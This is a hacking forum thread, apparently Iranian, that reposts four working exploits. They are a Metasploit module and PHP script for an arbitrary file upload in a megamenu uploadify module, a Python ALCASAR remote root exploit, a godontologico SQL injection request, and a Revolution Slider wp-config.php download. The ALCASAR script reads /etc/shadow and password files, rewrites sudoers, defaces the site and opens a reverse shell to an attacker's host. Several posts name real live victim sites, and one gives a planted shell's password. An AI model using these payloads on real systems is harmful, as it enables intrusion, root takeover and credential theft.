    #                                                                                          # 
    #                          #########################################                       # 
    #                          I'm The Black Devils member from Inj3ct0r Team                  # 
    #                          #########################################                       # 
    #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# 
    ## 
    # This Exploit must be use in Metasploit Framework 
    # http://metasploit.com/framework/ 
    # This module created by The Black Devils 
    ## 

    require 'msf/core' 
    require 'msf/core/exploit/php_exe' 

    class Metasploit3 < Msf::Exploit::Remote 
    Rank = ExcellentRanking 

    include Msf::Exploit::Remote::HttpClient 
    include Msf::Exploit::PhpEXE 

    def initialize(info = {}) 
    super(update_info(info, 
    'Name'             => ' joomla! megamenu module 'uploadify.php' Arbitrary File Upload Vulnerability', 
    'Description'   => %q{ 
    This module exploits a vulnerability found in joomla module 
    By abusing the image.php file, a malicious user can upload a file to a 
    temp directory without authentication, which results in arbitrary code execution. 
    }, 
    'Author'                 => 

    'The Black Devils', # initial discovery 
    ], 
    'License'               => MSF_LICENSE, 
    'References'     => 

    [ 'OSVDB', '82656' ], 

    ], 
    'Payload'               => 

    'BadChars' => "\x00", 
    }, 
    'Platform'         => 'php', 
    'Arch'             => ARCH_PHP, 
    'Targets'               => 

    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], 
    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] 
    ], 
    'DefaultTarget'  => 0, 
    'DisclosureDate' => 'Mar 26 2012')) 

    register_options( 

    OptString.new('TARGETURI', [true, 'The full URI path to joomla', '/joomla']) 
    ], self.class) 
    end 

    def check 
    uri =  target_uri.path 
    uri << '/' if uri[-1,1] != '/' 

    res = send_request_cgi({ 
    'method' => 'GET', 
    'uri'   => "#{uri}modules/megamenu/uploadify/uploadify.php" 
    }) 

    if not res or res.code != 200 
    return Exploit::CheckCode::Unknown 
    end 

    return Exploit::CheckCode::Appears 
    end 

    def exploit 
    uri =  target_uri.path 
    uri << '/' if uri[-1,1] != '/' 

    peer = "#{rhost}:#{rport}" 

    @payload_name = "#{rand_text_alpha(5)}.php" 
    php_payload = get_write_exec_payload(:unlink_self=>true) 

    data = Rex::MIME::Message.new 
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") 
    data.add_part("#{uri}modules/megamenu/uploadify/", nil, nil, "form-data; name=\"folder\"") 
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') 

    print_status("#{peer} - Uploading payload #{@payload_name}") 
    res = send_request_cgi({ 
    'method' => 'POST', 
    'uri'   => "#{uri}modules/megamenu/uploadify/uploadify.php", 
    'ctype'  => "multipart/form-data; boundary=#{data.bound}", 
    'data'   => post_data 
    }) 

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/ 
    fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") 
    end 

    upload_uri = res.body 

    print_status("#{peer} - Executing payload #{@payload_name}") 
    res = send_request_raw({ 
    'uri'   => upload_uri, 
    'method' => 'GET' 
    }) 
    end 
    end 

    #------------Arbitrary File Upload Vulnerability------ 
    <?php 
    $uploadfile
    ="cyber.php.gif"
    $ch curl_init("http://localhost/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/"); 
    curl_setopt($chCURLOPT_POSTtrue); 
    curl_setopt($chCURLOPT_POSTFIELDS
    array(
    'Filedata'=>"@$uploadfile")); 
    curl_setopt($chCURLOPT_RETURNTRANSFER1); 
    $postResult curl_exec($ch); 
    curl_close($ch); 
    print 
    "$postResult"
    ?> 
    Shell Access : http://localhost/modules/megamenu/uploadify/cyber.php.gif 
    <?php 
    phpinfo
    (); 
    ?> 
    #------------------ 
    DEMO 
    http://www.produits-corses.fr/modules/megamenu-/uploadify/uploadify.php 
    http://enayar.fr/modules/megamenu/uploadify/uploadify.php 
    http://www.satisfaction-gsm.com/modules/megamenu/uploadify/uploadify.php 
    http://prestashop.kyrnova.com/modules/megamenu-/uploadify/uploadify.php 

    shell 
    http://www.produits-corses.fr/modules/megamenu/uploadify//cyber.php 
    pass:oeb1590 

    # 6C3109D932754DAC   1337day.com [2013-01-09]   3E4098CEC9DB5A5A #
     
  10. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability

    ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability

    چون نوشته های زیادی بود فایل تکست هم ساختم ولی اپلودسنتر اجازه نمیداد برای همین zip کردم.

    PHP:
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    #
    ####
    #
    #    ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability
    #
    #    Author: eF
    #    Date  : 2014-09-12
    #    URL   : http://www.alcasar.net/
    #
    #    This is not a responsible disclosure coz' I have no sense of ethics and I don't give a f*ck.
    #
    #        db         88           ,ad8888ba,         db         ad88888ba         db         88888888ba
    #       d88b        88          d8"'    `"8b       d88b       d8"     "8b       d88b        88      "8b
    #      d8'`8b       88         d8'                d8'`8b      Y8,              d8'`8b       88      ,8P
    #     d8'  `8b      88         88                d8'  `8b     `Y8aaaaa,       d8'  `8b      88aaaaaa8P'
    #    d8YaaaaY8b     88         88               d8YaaaaY8b      `"""""8b,    d8YaaaaY8b     88""""88'
    #   d8""""""""8b    88         Y8,             d8""""""""8b           `8b   d8""""""""8b    88    `8b
    #  d8'        `8b   88          Y8a.    .a8P  d8'        `8b  Y8a     a8P  d8'        `8b   88     `8b
    # d8'          `8b  88888888888  `"Y8888Y"'  d8'          `8b  "Y88888P"  d8'          `8b  88      `8b
    #
    #
    # ALCASAR is a free Network Access Controller which controls the Internet consultation networks. 
    # It authenticates, attributes and protects users' access regardless their connected equipment 
    # (PC, smartphone, game console, etc.).
    #
    # I recently released an exploit for ALCASAR 2.8 (ALCASAR <= 2.8 Remote Code Execution Vulnerability Root).
    # As a reminder, it was a trivial code execution via a unfiltered exec() call:
    #
    #   $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
    #   exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
    #
    # A few days later, a new version corrects the vulnerability. Or maybe not...
    #
    # At first, this is how ALCASAR's developers present the previous vulnerability:

    # " A security hole has been discovered on ALCASAR V2.8 (only this version). This vulnerability allows a user "
    # " connected on the LAN to retrieve a lot of data from the server. The ALCASAR team is testing few security  "
    # " patches. A script that you could run on the active servers will be available on this forum ASAP. At that  "
    # " time, the download version of ALCASAR will be incremented (V2.8.1) "
    #
    # ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* the server:
    # Get a root shell, stop all services, sniff all connections, inject data in users' sessions, sniff passwords,
    # bypass firewall rules, act as another user, etc.
    # This is not just a matter of "retrieving a lot of data from the server".
    #
    # Not to alert users of real criticality of a vulnerability is a very serious lack of security.
    # Lying by saying that the vulnerability only affects version 2.8 while it also affects version 2.7 is another
    # one.
    #
    # Now, the patch itself: it tries to correct the vulnerability by filtering the vulnerable input:
    #
    # $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ? "" : $pattern;
    #
    # WTF?!
    # First, I think that the application no longer works. By default, filter_var() is going to accept an URL
    # only if its scheme is valid:
    #
    #   $ php -r 'var_dump(filter_var("www.google.com", FILTER_VALIDATE_URL));'
    #     bool(false)
    #   $ php -r 'var_dump(filter_var("http://www.google.com", FILTER_VALIDATE_URL));'
    #     string(21) "http://www.google.com"
    #
    # But... we cannot put http:// in the HTTP host field, the HTTP server won't let us...
    # Dev, did you try your patch?
    # Instead, to execute code, it's quite easy to bypass this filtering using "mailto:[email protected];cmd;"
    # Service down, vulnerability still present: double fail.
    #
    # The privilege escalation in the previous exploit was using openssl, to gain reading and writing rights
    # as root.
    #
    # The patch therefore removes openssl in the sudoers file (without changing the legitimate
    # calls in the PHP code...). So let's use another method: systemctl is still callable via sudo...
    #
    # We can create a service with our command and start it as root:
    #
    # sudo systemctl link /tmp/pwn3d.service
    # sudo systemctl start pwn3d.service
    #
    # Conclusion: triple fail.
    #
    # Wouldn't a "responsable de la sécurité des systèmes d'information d'un grand commandement" need a 
    # little training on secure PHP development?
    #
    # On ALCASAR website:
    #
    # "The security of the portal has been worked out like a bastion in order to resist to different
    # kinds of threat"
    #
    # LOLZ!!! Remote Root Code Execution does not seem to be part of these "different kinds of threat".
    #
    # ALCASAR is not built with security in mind. Apache user can sudo, there is no chroot, no separation,
    # the PHP code is dreadful, some passwords are unnecessarily stored in plaintext, the function to 
    # generate user password is weak, there are no system updates (kernel is out to date, from Jul 4 2013),
    # etc.
    #
    # Development is not really open either: there is no bugtracker, no trac, no way to see what has been 
    # patched, etc. If the elementary rules of open source development had been met, a user could have 
    # prevented this 2.8.1 patch from being crap.
    #
    #
    ####
     
    import sysosrehttplib
     
    class PWN_Alcasar:
     
     
       def __init__(selfhost):
     
           self.host host
            self
    .root False
     
        def exec_cmd
    (selfcmdoutput=False):
     
           tag os.urandom(4).encode('hex')
     
     
           cmd 'bash -c "%s" 2>&1' cmd.replace('"''\\"')
     
           if self.root:
     
               cmd 'sudo %s' cmd
     
            wrapper 
    'echo %s;echo %s|base64 -d -w0|sh|base64 -w0' % (tagcmd.encode('base64').replace('\n',''))
     
           wrapper wrapper.replace(' ''${IFS}')
     
           headers = {
     
               'host' 'mailto:[email protected];%s;#' wrapper
            
    }
     
     
           c httplib.HTTPConnection(self.host)
     
           c.request('GET''/index.php'''headers)
     
           r c.getresponse()
     
           data r.read()
     
           c.close()
     
     
           m re.search(r'%s, (.*)\s</div>' tagdata)
     
           if m:
     
               data m.group(1).decode('base64')
     
               if output:
     
                   print data
                return data
            return None
     
        def read_file
    (selffilepathoutput=True):
     
           return self.exec_cmd('cat "%s"' filepathoutput=output)
     
     
       def read_passwords(self):
     
           self.read_file('/root/ALCASAR-passwords.txt')
     
           self.read_file('/etc/shadow')
     
           self.read_file('/usr/local/etc/digest/key_all')
     
           self.read_file('/usr/local/etc/digest/key_admin')
     
           self.read_file('/usr/local/etc/digest/key_backup')
     
           self.read_file('/usr/local/etc/digest/key_manager')
     
           self.read_file('/usr/local/etc/digest/key_only_admin')
     
           self.read_file('/usr/local/etc/digest/key_only_backup')
     
           self.read_file('/usr/local/etc/digest/key_only_manager')
     
           alcasar_mysql self.read_file('/usr/local/sbin/alcasar-mysql.sh'output=False)
     
           if alcasar_mysql:
     
               m re.search(r'radiuspwd="(.*)"'alcasar_mysql)
     
               if m:
     
                   radiuspwd m.group(1)
     
                   sql 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
     
                   self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwdsql), output=True)
     
     
       def edit_sudoers(self):
     
           service  '[Unit]\n'
     
           service += 'Description=Just another ALCASAR lolcalr00t\n\n'
     
           service += '[Service]\n'
     
           service += 'Type=forking\n'
     
           service += 'KillMode=process\n'
     
           service += 'ExecStart=/bin/sh -c "sed -i s/BL,NF/BL,ALL,NF/g /etc/sudoers"\n'
     
           self.exec_cmd('echo %s | openssl base64 -d -out /tmp/Pwn3d.service -A' service.encode('base64').replace('\n'''))
     
           self.exec_cmd('sudo systemctl link /tmp/Pwn3d.service')
     
           self.exec_cmd('sudo systemctl start Pwn3d.service')
     
           if exploit.exec_cmd('sudo id').find('uid=0') != -1:
     
               self.root True
     
        def reverse_shell
    (selfriprport='80'):
     
           payload 'import socket,subprocess,os;'
     
           payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
     
           payload += 's.connect((\'%s\',%s));' % (riprport)
     
           payload += 'os.dup2(s.fileno(),0);'
     
           payload += 'os.dup2(s.fileno(),1);'
     
           payload += 'os.dup2(s.fileno(),2);'
     
           payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
     
           return self.exec_cmd('python -c "%s"' payload)
     
     
       def lolz(self):
     
           old 'http://www.wikipedia.org'
     
           new 'https://www.youtube.com/watch\?v=Q-J0f1yF75Y'
     
           self.exec_cmd('sed -i s,%s,%s,g /var/www/html/index.php' % (old, new), True)
     
    def usage():
     
       print 'Usage: %s host command (ip) (port)' sys.argv[0]
     
       print '       "command" can be a shell command or "reverseshell"'
     
       sys.exit(0)
     
     
    if __name__ == '__main__':
     
     
       print '#' 80
        print 
    '# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability'
     
       print '# Author: eF'
     
       print '#' 80
     
        if len
    (sys.argv) < 3:
     
           usage()
     
     
        cmd 
    sys.argv[2]
     
       if cmd == 'reverseshell':
     
           if len(sys.argv) < 5:
     
               print '[!] Need IP and port for the reverse shell...'
     
               sys.exit(0)
     
           rip sys.argv[3]
     
           rport sys.argv[4]
     
     
       exploit PWN_Alcasar(sys.argv[1])
     
       print '[-] whoami (should be apache):'
     
       exploit.exec_cmd('id'output=True)
     
       print '[+] On the way to the uid 0...'
     
       exploit.edit_sudoers()
     
       print '[-] Got root?'
     
       exploit.exec_cmd('id'output=True)
     
       exploit.lolz()
     
       if exploit.root:
     
           print '[+] Here are some passwords for you (again):'
     
           exploit.read_passwords()
     
       if cmd == 'reverseshell':
     
           print '[+] You should now have a shell on %s:%s' % (riprport)
     
           exploit.reverse_shell(riprport)
     
       else:
     
           print '[+] Your command Sir:'
     
           exploit.exec_cmd(cmdoutput=True)
     
       sys.exit(1)
     

    پیوست ها:

    • exploit.rar
      اندازه فایل:
      کیلوبایت 3.9
      دانلودها:
      2
  11. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    godontologico 5 - SQL Injection (0day)

    godontologico 5 - SQL Injection (0day)

    PHP:
    ########################################################################################
    [+] Exploit0day godontologico v5 SQL Inject                                        #
    [+] Authorvinicius777                                                #
    [+] Contactvinicius777 [ATgmail - @vinicius777_                                    #                     
    [+] Vendor Homepagehttp://sourceforge.net/projects/godontologico/                    #
    [+] Google D0rks"Smile Odonto - Enhancing your smile - www.smileodonto.com.br"       #
    [+] Google D0rks"Smile Odonto ® - Valorizando seu sorriso - www.smileodonto.com.br"  #
    ########################################################################################
     
    ### Mummy bought me a new hat today #
     
     
    You can considerate it a 0dayOnce logged as 'admin' browse to 'Utilites' ->  'Files' -> 'Clinic Files'upload whatever you want toaccess it by clicking in 'View File' or browse directly through 'http://xxx/arquivos/daclinica/files. Enjoy it xD ###
     
      
    [1] Sql Injection POST Time Based Blind
     
    #Note: Time based Injection on POST requests as indicated on the output. You might use sqlmap -l to load it though. Admin hashes under Table ‘funcionarios' 
    on column ‘senha'.  
     
    PoC:  
     
    POST /gco/wallpapers/index_ajax.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: http://localhost/gco/
    Content-Length: 61
    Cookie: __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sLogin=admin; bLicense53=true; ccss=2; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; mySession_ID=rkc83o3o3e5df60aoocpb2bqb1; groupoffice=u8q9fb14k1jqvl0vtaidqr3va1; PHPSESSID=pk5053kt9fh1p1jm8kcvn6kh05; Loggedin=True
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
     
     
    usuario=['
    SQL INJECTION']&senha=%70%61%73%73&login=%4C%6F%67%69%6E
     
     
     
    Vulnerable Code:
    [+] wallpapers/index_ajax.php
     
     
        $nivel = '
    Funcionario';
                    $row = mysql_fetch_array(mysql_query("SELECT * FROM `funcionarios` WHERE `usuario` = '
    $_POST[usuario]'"));
                    if($row[nome] == "") {
                            $nivel = '
    Dentista';
                            $row = mysql_fetch_array(mysql_query("SELECT * FROM `dentistas` WHERE `usuario` = '
    $_POST[usuario]'"));
                            if($row[nome] == "") {
                                    //echo "<scr"."ipt>alert('
    Login ou senha incorretos!'); Ajax('wallpapers/index', 'conteudo', '')</scr"."ipt>";
                            }
     
  12. Sir.h4m1D
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏24/10/14
    ارسال ها:
    512
    تشکر شده:
    655
    جنسیت:
    شغل:
    Exploiter
    محل سکونت:
    Iran
    Name:
    HamiD
    Main os:
    Windows
    http://1337day.com/exploit/23198

    exploit omid (jok3r)


    PHP:
    [+] TitleWordpress slider reolusion local file download
    [+] Date2015-01-25
    [+] AuthorJOK3R
    [+] Vendor Homepagehttps://wordpress.org/plugins/patch-for-revolution-slider/
    [+] Tested onwindows 7 firefox kali linux firefox
    [+] Vulnerable Files: /plugins/revolution-slider/
    [+} 
    Dork "Index of" /wp-content/plugins/revolution-slider/
     
    ### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
     
    ### Demo:
    http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
    http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
    http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
     
     
    ### Credits:
    [+] Special ThanksSheytan Azzam Mohamad NOfozi Root3r Sina_lizard Ali Ahmady iliya Norton Mr.Moein* - ALIREZA_PROMIS*
    And 
    All iranian Hacker's And Exploiter'<3
     
    [+] iran-cyber.in
     
            
    #  1337day.com [2015-01-29]  #
     
بارگذاری...
مطالب مشابه
  1. sajjadsotoudeh
    پاسخ ها:
    1
    دانلودها:
    960
  2. Sir.h4m1D
    پاسخ ها:
    0
    دانلودها:
    393
  3. Mkali07
    پاسخ ها:
    1
    دانلودها:
    929
  4. JOK3R
    پاسخ ها:
    0
    دانلودها:
    1,186
  5. MR.SHDOVV
    پاسخ ها:
    5
    دانلودها:
    1,252
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .